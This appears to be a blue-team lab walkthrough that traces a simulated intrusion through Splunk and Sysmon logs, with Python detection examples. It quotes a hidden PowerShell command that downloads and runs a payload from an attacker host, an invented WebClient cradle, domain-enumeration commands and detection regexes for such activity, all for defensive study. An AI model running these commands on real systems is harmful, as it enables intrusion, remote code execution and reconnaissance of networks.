# Lab205 - Walkthrough

Q1) The intrusion started when the victim accessed a suspicious URL from a file-sharing service. What was the name of the website that triggered the compromise?

To begin unraveling this attack, our first objective is to determine how the attacker initially gained access to the victim machine. In many compromises, the first foothold comes from a user interacting with a malicious link, which can silently lead to the download or execution of attacker-controlled content. By identifying the exact domain visited, we gain a clear picture of where the infection chain began and how the attacker delivered their stager.

In this case, our victim is the workstation DESKTOP, which executed suspicious activity on August 25, 2025. To confirm the initial access vector, we focus on DNS activity logs, because whenever a user visits a website, the host must first resolve the domain name to an IP address. Fortunately, Sysmon provides this visibility through Event ID 22 (DNS Query), which records every DNS lookup a process makes.

We begin by searching Splunk for all DNS queries made by the victim machine. Since benign background traffic clutters the results, we exclude known-good noise (the corporate domain and the trusted remote-support tool), count lookups per domain, and sort ascending so the rarest domains surface first:

index="main" host=DESKTOP EventCode=22 QueryName!=*splashtop* QueryName!=*coretech.lab*
| stats count by QueryName
| table QueryName, count
| sort count

Reviewing the output, we immediately notice a suspicious entry: paste.sh

This domain appears only once during the timeframe of interest, making it stand out as an anomaly. Domains like paste.sh are particularly interesting because paste services are frequently abused by attackers to host payloads, malicious scripts, or encoded command snippets. In this attack, the single lookup of paste.sh aligns with the victim browsing activity that initiated the compromise.

To confirm when and how this query occurred, let's refine our search:

index="main" EventCode=22 QueryName="paste.sh"
| table _time, host, QueryName, Image, User

The result confirms that on 2025-08-25 at 13:27:40 the victim host DESKTOP, running msedge.exe under the logged-in user, issued a DNS lookup for paste.sh. The browser visit to the malicious domain is therefore the earliest event in the intrusion timeline.

Answer: paste.sh
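The two SPL searches above reduce to a rarity count followed by an attribution pivot. The following Python is an added example (not part of the original walkthrough or the lab) that runs the same logic over a handful of constructed Sysmon Event ID 22 records; the hosts, images, timestamps and the FILESRV noise are made up to exercise the filters, and only the paste.sh lookup at 13:27:40 by msedge.exe mirrors the walkthrough.

```python
from collections import Counter
from fnmatch import fnmatch

# Constructed Sysmon Event ID 22 (DNS query) records in the field layout
# Splunk shows. Everything except the paste.sh row is illustrative noise.
EDGE = r"C:\Program Files\Microsoft\Edge\msedge.exe"
SVCHOST = r"C:\Windows\System32\svchost.exe"
DNS_EVENTS = [
    {"_time": "2025-08-25T13:20:01", "host": "DESKTOP", "QueryName": "dc01.coretech.lab",
     "Image": SVCHOST, "User": r"NT AUTHORITY\NETWORK SERVICE"},
    {"_time": "2025-08-25T13:21:14", "host": "DESKTOP", "QueryName": "relay.splashtop.com",
     "Image": r"C:\Program Files\Splashtop\SRService.exe", "User": r"NT AUTHORITY\SYSTEM"},
    {"_time": "2025-08-25T13:22:40", "host": "DESKTOP", "QueryName": "www.bing.com",
     "Image": EDGE, "User": r"coretech\t.leon"},
    {"_time": "2025-08-25T13:25:09", "host": "DESKTOP", "QueryName": "dc01.coretech.lab",
     "Image": SVCHOST, "User": r"NT AUTHORITY\NETWORK SERVICE"},
    {"_time": "2025-08-25T13:26:00", "host": "FILESRV", "QueryName": "update.microsoft.com",
     "Image": SVCHOST, "User": r"NT AUTHORITY\SYSTEM"},
    {"_time": "2025-08-25T13:27:40", "host": "DESKTOP", "QueryName": "paste.sh",
     "Image": EDGE, "User": r"coretech\t.leon"},
    {"_time": "2025-08-25T13:28:02", "host": "DESKTOP", "QueryName": "www.bing.com",
     "Image": EDGE, "User": r"coretech\t.leon"},
]

# Same wildcards the SPL excludes (QueryName!=*splashtop* QueryName!=*coretech.lab*).
EXCLUDE = ("*splashtop*", "*coretech.lab*")


def rare_domains(events, host="DESKTOP", exclude=EXCLUDE):
    """Count lookups per domain for one host, dropping excluded patterns, and
    return (domain, count) pairs rarest-first: 'stats count by QueryName | sort count'."""
    counts = Counter(
        e["QueryName"].lower()
        for e in events
        if e["host"] == host
        and not any(fnmatch(e["QueryName"].lower(), pat) for pat in exclude)
    )
    return sorted(counts.items(), key=lambda kv: (kv[1], kv[0]))


def pivot(events, domain, host="DESKTOP"):
    """For one domain, return (time, image basename, user) per lookup, oldest
    first: the attribution step that ties the query to a browser and a user."""
    hits = [e for e in events if e["host"] == host and e["QueryName"].lower() == domain.lower()]
    return [(e["_time"], e["Image"].rsplit("\\", 1)[-1], e["User"])
            for e in sorted(hits, key=lambda e: e["_time"])]


if __name__ == "__main__":
    for domain, n in rare_domains(DNS_EVENTS):
        print(f"{n:>3}  {domain}")
    for row in pivot(DNS_EVENTS, "paste.sh"):
        print(*row, sep="  ")
```

On real data, rarity on a single host still surfaces plenty of CDN and telemetry domains; ranking by how many hosts in the fleet resolved a name (`stats count, dc(host) by QueryName` in SPL) is a stronger first cut than a single-host count.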

Q2) After visiting this website, the victim executed a PowerShell command via Run. What is the full url to the file that was downloaded after executing this command?

Once we have established that the victim machine accessed the suspicious domain paste.sh, our next step is to determine what happened immediately afterward. In many attack scenarios, a malicious site does not cause direct damage on its own; instead, it often provides the user with a command or payload to execute.

In this case, the investigation indicates that the victim used the Windows Run dialog to execute a PowerShell command. Such commands are critical to identify because they often represent the very first stage of malicious code delivery, typically downloading and executing a file that continues the attack chain.

Three overlapping sources record PowerShell execution: Sysmon Event ID 1 (process creation with the full command line), Windows Security Event ID 4688 (process creation, which carries the command line only when the "Include command line in process creation events" policy is enabled), and PowerShell Event ID 4104 (script block logging, which captures the code that actually ran even when the command line is encoded or obfuscated). In Splunk we pivot on these sources for PowerShell activity shortly after the paste.sh lookup at 2025-08-25 13:27:40.

index="main" host=DESKTOP (EventCode=1 OR EventCode=4688)
(Image="*\\powershell.exe" OR CommandLine="*powershell*")
| table _time, User, Image, CommandLine, ParentImage
| sort _time

At approximately 13:30 the logs show a PowerShell execution by the logged-in user that launched with the -WindowStyle Hidden flag to keep the console out of sight, fetched an executable from 10.10.5.171:8883, and wrote it to the user's TEMP directory.

The exact command observed is:

powershell.exe -WindowStyle Hidden -c "iwr http://10.10.5.171:8883/iexploreplugin.exe -OutFile $env:TEMP\iexploreplugin.exe; Start-Process $env:TEMP\iexploreplugin.exe"

The PowerShell command leveraged iwr (Invoke-WebRequest) to retrieve iexploreplugin.exe from the attacker-controlled host http://10.10.5.171:8883/, stored it in the user’s %TEMP% directory, and executed it via Start-Process, thereby confirming that the payload delivered to the victim system following the paste.sh visit was iexploreplugin.exe.

Answer: http://10.10.5.171:8883/iexploreplugin.exe
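Reading the URL and drop path out of a cradle by eye works for one command; at scale it is worth parsing. The following Python is an added example, not part of the original walkthrough or the lab: it scans constructed Sysmon Event ID 1 records for PowerShell launched after the paste.sh lookup and extracts the download URL, the expanded output path and the hidden/execute hints. The first command line is the one quoted above; the second (a WebClient-style cradle fetching a stage.ps1) is invented purely to show the parser handling a second download pattern, and the TEMP path used to expand $env:TEMP is an assumption. curl and wget are handled because Windows PowerShell 5.1 aliases both to Invoke-WebRequest.

```python
import re

# The walkthrough's command line, plus a constructed WebClient cradle.
CMD_IWR = ('powershell.exe -WindowStyle Hidden -c "iwr http://10.10.5.171:8883/iexploreplugin.exe '
           '-OutFile $env:TEMP\\iexploreplugin.exe; Start-Process $env:TEMP\\iexploreplugin.exe"')
CMD_WEBCLIENT = ("powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://10.10.5.171:8883/stage.ps1')\"")  # constructed

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PROC_EVENTS = [  # constructed Sysmon Event ID 1 records
    {"_time": "2025-08-25T13:29:50", "Image": r"C:\Windows\explorer.exe",
     "CommandLine": r"C:\Windows\Explorer.EXE", "User": r"coretech\t.leon"},
    {"_time": "2025-08-25T13:30:18", "Image": PS, "CommandLine": CMD_IWR, "User": r"coretech\t.leon"},
    {"_time": "2025-08-25T13:41:03", "Image": PS, "CommandLine": CMD_WEBCLIENT, "User": r"coretech\t.leon"},
]
ASSUMED_ENV = {"TEMP": r"C:\Users\t.leon\AppData\Local\Temp"}  # assumption, not lab data

# Invoke-WebRequest and its aliases: capture the URL and, when present, -OutFile.
IWR_RE = re.compile(
    r"\b(?:iwr|invoke-webrequest|curl|wget)\s+(?:-uri\s+)?['\"]?(?P<url>https?://[^\s'\";]+)['\"]?"
    r"(?:.*?-outfile\s+['\"]?(?P<out>[^\s'\";]+))?", re.I)
# (New-Object Net.WebClient).DownloadString('url') / .DownloadFile('url', ...)
WEBCLIENT_RE = re.compile(
    r"new-object\s+(?:system\.)?net\.webclient\)?\s*\.download(?:string|file)\(\s*['\"]"
    r"(?P<url>https?://[^'\"]+)['\"]", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
EXEC_RE = re.compile(r"\b(?:start-process|iex|invoke-expression)\b", re.I)


def parse_cradle(cmdline, env=None):
    """Return {url, outfile, hidden, executes} for a recognised download cradle,
    or None. $env:NAME in the output path is expanded from the assumed env."""
    env = env or ASSUMED_ENV
    m = IWR_RE.search(cmdline) or WEBCLIENT_RE.search(cmdline)
    if not m:
        return None
    out = m.groupdict().get("out")
    if out:
        out = re.sub(r"\$env:(\w+)", lambda v: env.get(v.group(1).upper(), v.group(0)), out, flags=re.I)
    return {"url": m.group("url"), "outfile": out,
            "hidden": bool(HIDDEN_RE.search(cmdline)),
            "executes": bool(EXEC_RE.search(cmdline))}


def cradles_after(events, anchor):
    """(time, parsed cradle) for PowerShell launches at or after the anchor time
    (the paste.sh lookup), oldest first; non-cradle PowerShell is skipped."""
    rows = []
    for e in sorted(events, key=lambda e: e["_time"]):
        if e["_time"] < anchor or not e["Image"].lower().endswith("powershell.exe"):
            continue
        parsed = parse_cradle(e["CommandLine"])
        if parsed:
            rows.append((e["_time"], parsed))
    return rows


if __name__ == "__main__":
    for when, info in cradles_after(PROC_EVENTS, "2025-08-25T13:27:40"):
        print(when, info)
```

The output path matters as much as the URL: it is the pivot into Sysmon Event ID 11 (was the file actually written?) and Event ID 1 (was it executed, and with what ProcessGuid?).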

Q3) Once executed, the payload established a remote connection. What is the attacker’s IP address and port used for the first C2 communication?

Now that we’ve confirmed the delivery of the payload iexploreplugin.exe via PowerShell, our next goal is to determine how this malware communicated back to its command-and-control (C2) infrastructure. In most modern attacks, payloads don’t just sit idle on disk; they actively beacon out to the attacker’s infrastructure to receive further instructions.

Since we know that iexploreplugin.exe was downloaded and executed at 13:30:32 by the user coretech\t.leon on the host DESKTOP, our investigation will now focus on identifying any new network connections initiated by this process.

Outbound communication can be traced across several telemetry sources, but Sysmon Event ID 3 is the most conclusive for attribution: it records the initiating process (image, ProcessGuid and user) together with source and destination IP, port and protocol, so a connection can be tied directly to iexploreplugin.exe. Security Event ID 5156 (Windows Filtering Platform) also records the application path and endpoints but is far noisier and lacks the user and process GUID, and DNS Event ID 22 only helps when the C2 address is resolved from a name rather than hard-coded as an IP.

Because we already know the time (13:30:32) and the process (iexploreplugin.exe in the user’s TEMP directory), we can zoom in on all network connections from this process within that time window:

index="main" host=DESKTOP EventCode=3 Image="*iexploreplugin.exe"
| table _time, User, Image, DestinationIp, DestinationPort, Protocol, SourceIp, SourcePort
| sort _time

When we review the logs just after 13:30:32, we observe that iexploreplugin.exe on host DESKTOP initiated a TCP connection to destination IP 10.10.5.62 over port 8080. This confirms that the payload successfully established its first command-and-control (C2) channel with attacker-controlled infrastructure.

Defenders should always monitor for unusual outbound connections, especially to ports such as 8080, a common alternate HTTP port that attackers use so C2 traffic blends in with ordinary web activity. Tying these connections to suspicious processes (like iexploreplugin.exe) is what allows us to confirm they are malicious; a destination and port on their own rarely are.

Answer: 10.10.5.62:8080
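The attribution step above is a join between the payload's process-creation event and its network events. The following Python is an added example, not part of the original walkthrough or the lab, that performs that join over constructed Sysmon Event ID 1 and Event ID 3 records and then measures the gaps between successive connections. The payload path, its 13:30:32 start and the 10.10.5.62:8080 endpoint follow the walkthrough; the GUID stand-ins, PIDs, the 10.10.5.40 source address, the 60-second cadence and the svchost noise (including a stale record that reuses PID 4412 from before the payload started) are made up to show why the join key must be ProcessGuid rather than ProcessId.

```python
from datetime import datetime

PAYLOAD = r"C:\Users\t.leon\AppData\Local\Temp\iexploreplugin.exe"
SVCHOST = r"C:\Windows\System32\svchost.exe"
PAYLOAD_GUID = "{GUID-PAYLOAD}"  # readable stand-in for a real Sysmon ProcessGuid


def net(t, guid, pid, image, proto, sport, dip, dport):
    """One constructed Sysmon Event ID 3 record; 10.10.5.40 is an assumed host IP."""
    return {"_time": f"2025-08-25T{t}", "ProcessGuid": guid, "ProcessId": pid, "Image": image,
            "Protocol": proto, "SourceIp": "10.10.5.40", "SourcePort": sport,
            "DestinationIp": dip, "DestinationPort": dport}


PROCESS_EVENTS = [  # constructed Sysmon Event ID 1
    {"_time": "2025-08-25T13:30:32", "ProcessGuid": PAYLOAD_GUID, "ProcessId": 4412,
     "Image": PAYLOAD, "User": r"coretech\t.leon"},
]
NETWORK_EVENTS = [
    # stale: PID 4412 belonged to a different, already-exited process
    net("13:29:58", "{GUID-STALE}", 4412, SVCHOST, "udp", 58211, "10.10.5.1", 53),
    net("13:30:33", "{GUID-SVCHOST}", 1180, SVCHOST, "udp", 61002, "10.10.5.1", 53),
    net("13:30:34", PAYLOAD_GUID, 4412, PAYLOAD, "tcp", 49811, "10.10.5.62", 8080),
    net("13:31:34", PAYLOAD_GUID, 4412, PAYLOAD, "tcp", 49815, "10.10.5.62", 8080),
    net("13:32:34", PAYLOAD_GUID, 4412, PAYLOAD, "tcp", 49820, "10.10.5.62", 8080),
]


def connections(net_events, *, guid=None, pid=None, not_before=None):
    """Network events for one process, oldest first. Joining on pid alone pulls
    in the stale record; guid (optionally bounded by start time) does not."""
    rows = [n for n in net_events
            if (guid is None or n["ProcessGuid"] == guid)
            and (pid is None or n["ProcessId"] == pid)
            and (not_before is None or n["_time"] >= not_before)]
    return sorted(rows, key=lambda n: n["_time"])


def first_c2(image_suffix, proc_events, net_events):
    """Find the payload's process-creation event, then its earliest connection,
    returned as 'ip:port' (None if the process or its traffic is absent)."""
    starts = [p for p in proc_events if p["Image"].lower().endswith(image_suffix.lower())]
    if not starts:
        return None
    proc = min(starts, key=lambda p: p["_time"])
    conns = connections(net_events, guid=proc["ProcessGuid"], not_before=proc["_time"])
    if not conns:
        return None
    return f'{conns[0]["DestinationIp"]}:{conns[0]["DestinationPort"]}'


def beacon_intervals(guid, net_events):
    """Seconds between successive connections, per destination, for one process.
    Near-constant gaps are the classic fingerprint of a beacon check-in."""
    by_dest = {}
    for n in connections(net_events, guid=guid):
        key = (n["DestinationIp"], n["DestinationPort"])
        by_dest.setdefault(key, []).append(datetime.fromisoformat(n["_time"]))
    return {dest: [int((b - a).total_seconds()) for a, b in zip(times, times[1:])]
            for dest, times in by_dest.items()}


if __name__ == "__main__":
    print(first_c2("iexploreplugin.exe", PROCESS_EVENTS, NETWORK_EVENTS))
    print(beacon_intervals(PAYLOAD_GUID, NETWORK_EVENTS))
```

In SPL the equivalent join is `ProcessGuid` across EventCode=1 and EventCode=3 (for example with `stats` or `transaction` by ProcessGuid); joining on ProcessId across a day of logs silently merges unrelated processes.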

Q4) During discovery, the attacker attempted to enumerate domain accounts. Which command did they use to list all domain users?

After establishing the first C2 channel through iexploreplugin.exe, the attacker quickly began a discovery phase. At this stage, adversaries typically want to learn more about the environment they’ve landed in: who the users are, what machines exist, and where valuable targets like domain controllers reside.

One of the first actions adversaries often perform is to enumerate accounts. Knowing which accounts exist and especially which have administrative privileges, helps the attacker plan their privilege escalation and lateral movement.

To investigate attacker enumeration, we rely on two primary artifacts: Sysmon Event ID 1, which provides the full command line for every executed process, and Windows Security Event ID 4688, which also records process creation but only includes the command line when command-line auditing is enabled. Since the enumeration was carried out interactively through the attacker's C2 session, we expect these commands (net, whoami and the like) to appear as children or grandchildren of iexploreplugin.exe, typically via a cmd.exe it spawns, or of whichever process the malware later migrated into, so we focus on process creation logs to determine exactly which commands were executed.

index="main" host=DESKTOP (EventCode=1 OR EventCode=4688) (CommandLine="*net *" OR CommandLine="*whoami*" OR CommandLine="*nltest*")
| table _time, User, ParentImage, Image, CommandLine
| sort - _time

As we review the output, we notice several discovery commands such as net localgroup administrators, whoami, and hostname. The command that stands out, however, is net user /domain, which queries Active Directory to enumerate all domain accounts. This is particularly significant because it leverages a built-in Windows utility, requiring no external tools, making it a common technique attackers use for reconnaissance.

Answer: net user /domain
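A keyword search for net, whoami and nltest also returns legitimate uses of those tools; what makes the hits above attacker activity is their lineage back to iexploreplugin.exe. The following Python is an added example, not part of the original walkthrough or the lab, that classifies command lines against a small table of discovery patterns and keeps only those whose parent chain leads to the payload. The payload lineage (cmd.exe under iexploreplugin.exe running whoami, net localgroup administrators and net user /domain) follows the walkthrough; the GUID stand-ins, the user-run whoami under Explorer and the service's net start are made up so that the lineage filter has something to reject. The MITRE ATT&CK technique IDs in the table are the standard ones for these commands.

```python
import re

SYS32 = r"C:\Windows\System32"
PAYLOAD = r"C:\Users\t.leon\AppData\Local\Temp\iexploreplugin.exe"


def ev(t, guid, parent, image, cmd, user=r"coretech\t.leon"):
    """One constructed Sysmon Event ID 1 record (GUIDs are readable stand-ins)."""
    return {"_time": f"2025-08-25T{t}", "ProcessGuid": guid, "ParentProcessGuid": parent,
            "Image": image, "CommandLine": cmd, "User": user}


PROC = [
    ev("09:02:11", "{EXPLORER}", None, r"C:\Windows\explorer.exe", r"C:\Windows\Explorer.EXE"),
    # noise: the user ran whoami from a shell; a service ran "net start"
    ev("13:10:00", "{CMD-USER}", "{EXPLORER}", rf"{SYS32}\cmd.exe", "cmd.exe /c whoami"),
    ev("13:10:00", "{WHOAMI-USER}", "{CMD-USER}", rf"{SYS32}\whoami.exe", "whoami"),
    ev("13:15:00", "{SVC}", None, rf"{SYS32}\svchost.exe", "svchost.exe -k netsvcs", user=r"NT AUTHORITY\SYSTEM"),
    ev("13:15:01", "{NET-SVC}", "{SVC}", rf"{SYS32}\net.exe", "net start", user=r"NT AUTHORITY\SYSTEM"),
    # the walkthrough's chain: powershell -> payload -> cmd -> discovery commands
    ev("13:30:18", "{PS}", "{EXPLORER}", rf"{SYS32}\WindowsPowerShell\v1.0\powershell.exe",
       'powershell.exe -WindowStyle Hidden -c "iwr http://10.10.5.171:8883/iexploreplugin.exe '
       '-OutFile $env:TEMP\\iexploreplugin.exe; Start-Process $env:TEMP\\iexploreplugin.exe"'),
    ev("13:30:32", "{PAYLOAD}", "{PS}", PAYLOAD, PAYLOAD),
    ev("13:30:58", "{CMD-C2}", "{PAYLOAD}", rf"{SYS32}\cmd.exe", "cmd.exe"),
    ev("13:31:02", "{WHOAMI}", "{CMD-C2}", rf"{SYS32}\whoami.exe", "whoami"),
    ev("13:31:20", "{NET-LG}", "{CMD-C2}", rf"{SYS32}\net.exe", "net localgroup administrators"),
    ev("13:31:20", "{NET1-LG}", "{NET-LG}", rf"{SYS32}\net1.exe", rf"{SYS32}\net1 localgroup administrators"),
    ev("13:31:45", "{NET-DU}", "{CMD-C2}", rf"{SYS32}\net.exe", "net user /domain"),
    ev("13:31:45", "{NET1-DU}", "{NET-DU}", rf"{SYS32}\net1.exe", rf"{SYS32}\net1 user /domain"),
]

# Ordered: the more specific domain forms must be tried before the local ones.
DISCOVERY = [
    (r"\bnet1?\s+user\b.*\s/domain\b",  "domain account enumeration (T1087.002)"),
    (r"\bnet1?\s+group\b.*\s/domain\b", "domain group enumeration (T1069.002)"),
    (r"\bnet1?\s+localgroup\b",         "local group enumeration (T1069.001)"),
    (r"\bnet1?\s+user\b",               "local account enumeration (T1087.001)"),
    (r"\bwhoami\b",                     "owner/user discovery (T1033)"),
    (r"\bnltest\b",                     "domain trust / DC discovery (T1482)"),
    (r"\b(?:hostname|systeminfo)\b",    "system information discovery (T1082)"),
]


def classify(cmdline):
    for pattern, label in DISCOVERY:
        if re.search(pattern, cmdline, re.I):
            return label
    return None


def ancestry(guid, by_guid):
    """Image basenames from guid up to the root, following ParentProcessGuid."""
    chain = []
    while guid in by_guid and len(chain) < 64:
        e = by_guid[guid]
        chain.append(e["Image"].rsplit("\\", 1)[-1].lower())
        guid = e["ParentProcessGuid"]
    return chain


def discovery_from(root_image, events):
    """(time, command line, label) for discovery commands descended from root_image."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    hits = []
    for e in sorted(events, key=lambda e: e["_time"]):
        if e["Image"].lower().endswith("net1.exe"):
            continue  # net.exe hands most subcommands to net1.exe; count the parent once
        label = classify(e["CommandLine"])
        if label and root_image.lower() in ancestry(e["ParentProcessGuid"], by_guid):
            hits.append((e["_time"], e["CommandLine"], label))
    return hits


if __name__ == "__main__":
    for row in discovery_from("iexploreplugin.exe", PROC):
        print(*row, sep="  ")
```

Because Sysmon records ParentProcessGuid, the walk up the tree survives PID reuse; the same idea in SPL is a self-join of EventCode=1 on ParentProcessGuid = ProcessGuid, repeated once per generation you need.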

Q5) The attacker, during reconnaissance, ran an enumeration tool via C2 after migrating to another process. The tool then generated an output file on the victim host. Which process did they migrate into, and what file was created?

At this stage of the investigation, we know the attacker had established a C2 channel from the victim machine and begun executing enumeration commands (net user /domain, whoami, etc.). Our next task is to determine what more advanced activity they performed during the same timeframe.

Because enumeration tools typically generate new files (logs, dumps, or archives), we can look for evidence of file creation. Sysmon Event ID 11 (FileCreate) is an excellent place to start, since it records whenever a new file appears on disk.

From earlier analysis, we know the suspicious activity occurred shortly after 13:30:32, when iexploreplugin.exe was executed and the attacker began running discovery commands.

To avoid too much noise, we narrow the search to a 10-minute window (13:30 to 13:40), with the bounds written into the query rather than left to the time picker so the search is reproducible:

index="main" host=DESKTOP EventCode=11 earliest="08/25/2025:13:30:00" latest="08/25/2025:13:40:00"
| table _time, Image, TargetFilename, User
| sort 0 _time

Among the routine files, a group of suspicious filenames immediately stands out. JSON files whose names reference users, computers, groups, GPOs, and domains strongly suggest bulk Active Directory enumeration, which is not normal workstation activity. Even more suspicious is a ZIP file with a timestamp in its name, which likely bundles the collected data for exfiltration.

Now that we know these files exist, the next step is to figure out which process created them. For that, we extend our query to include the Image field:

index="main" host=DESKTOP EventCode=11 (TargetFilename=*.zip OR TargetFilename=*.json)
| table _time, Image, TargetFilename, User

When we review the output, we find something highly unusual: all of these files were created by notepad.exe. This is a clear anomaly, as Notepad is a simple text editor and does not normally generate JSON or ZIP archives. The fact that notepad.exe is responsible for these file creations is a strong indicator that the attacker migrated into the Notepad process and ran their enumeration tool from within it. To corroborate the migration, look for Sysmon Event ID 8 (CreateRemoteThread) or Event ID 10 (ProcessAccess) with iexploreplugin.exe as the source and notepad.exe as the target, and check whether that notepad.exe instance was itself spawned by the payload.

Answer: notepad.exe,20250825133552_BloodHound.zip
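The finding above rests on two checks a detection rule can encode: a writer producing file types outside its normal repertoire, and a cluster of files that match SharpHound's naming convention. The following Python is an added example, not part of the original walkthrough or the lab, that runs both over constructed Sysmon Event ID 11 records. The ZIP name is the one from the answer; the JSON names follow SharpHound's timestamp_object.json pattern, the output directory, the Edge and Notepad noise files and the writer-to-extension baseline are assumptions to be tuned per environment.

```python
import re
from collections import defaultdict

OUTDIR = r"C:\Users\t.leon\AppData\Local\Temp"  # assumed drop directory
NOTEPAD = r"C:\Windows\System32\notepad.exe"


def fc(t, image, name, user=r"coretech\t.leon"):
    """One constructed Sysmon Event ID 11 (FileCreate) record."""
    return {"_time": f"2025-08-25T{t}", "EventCode": 11, "Image": image,
            "TargetFilename": f"{OUTDIR}\\{name}", "User": user}


FILE_EVENTS = [
    fc("13:31:10", r"C:\Program Files\Microsoft\Edge\msedge.exe", "report.pdf"),
    fc("13:33:05", NOTEPAD, "notes.txt"),
    fc("13:35:52", NOTEPAD, "20250825133552_users.json"),
    fc("13:35:52", NOTEPAD, "20250825133552_computers.json"),
    fc("13:35:52", NOTEPAD, "20250825133552_groups.json"),
    fc("13:35:53", NOTEPAD, "20250825133552_gpos.json"),
    fc("13:35:53", NOTEPAD, "20250825133552_domains.json"),
    fc("13:35:55", NOTEPAD, "20250825133552_BloodHound.zip"),
    fc("13:38:40", r"C:\Windows\System32\svchost.exe", "report.tmp", user=r"NT AUTHORITY\SYSTEM"),
]

# Extensions each writer is expected to produce (assumed baseline). Writers
# absent from the table are not judged at all.
BASELINE = {
    "notepad.exe": {".txt", ".log", ".ini", ".cfg"},
    "msedge.exe": {".tmp", ".crdownload", ".pdf"},
}
# SharpHound naming: <yyyyMMddHHmmss>_<object>.json and <stamp>_BloodHound.zip
SHARPHOUND_RE = re.compile(
    r"^(?P<stamp>\d{14})_(?P<kind>bloodhound\.zip|"
    r"(?:users|computers|groups|gpos|domains|ous|containers)\.json)$", re.I)


def _basename(path):
    return path.rsplit("\\", 1)[-1]


def unexpected_writes(events, start, end, baseline=BASELINE):
    """{writer: sorted unexpected extensions} for file creations in [start, end)."""
    found = defaultdict(set)
    for e in events:
        if not (start <= e["_time"] < end):
            continue
        writer = _basename(e["Image"]).lower()
        if writer not in baseline:
            continue
        name = _basename(e["TargetFilename"])
        ext = name[name.rfind("."):].lower() if "." in name else ""
        if ext not in baseline[writer]:
            found[writer].add(ext)
    return {w: sorted(exts) for w, exts in found.items()}


def sharphound_artifacts(events):
    """Group SharpHound-named files by (writer, collection stamp), oldest first,
    so the ZIP can be tied to the JSON files of the same run."""
    groups = defaultdict(list)
    for e in sorted(events, key=lambda e: e["_time"]):
        m = SHARPHOUND_RE.match(_basename(e["TargetFilename"]))
        if m:
            groups[(_basename(e["Image"]).lower(), m.group("stamp"))].append(_basename(e["TargetFilename"]))
    return dict(groups)


if __name__ == "__main__":
    print(unexpected_writes(FILE_EVENTS, "2025-08-25T13:30:00", "2025-08-25T13:40:00"))
    for (writer, stamp), names in sharphound_artifacts(FILE_EVENTS).items():
        print(writer, stamp, names)
```

The baseline check is the more general of the two: it would flag a migrated-into notepad.exe even if the tooling were renamed, whereas the SharpHound pattern is trivially defeated by an operator who changes the output prefix.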
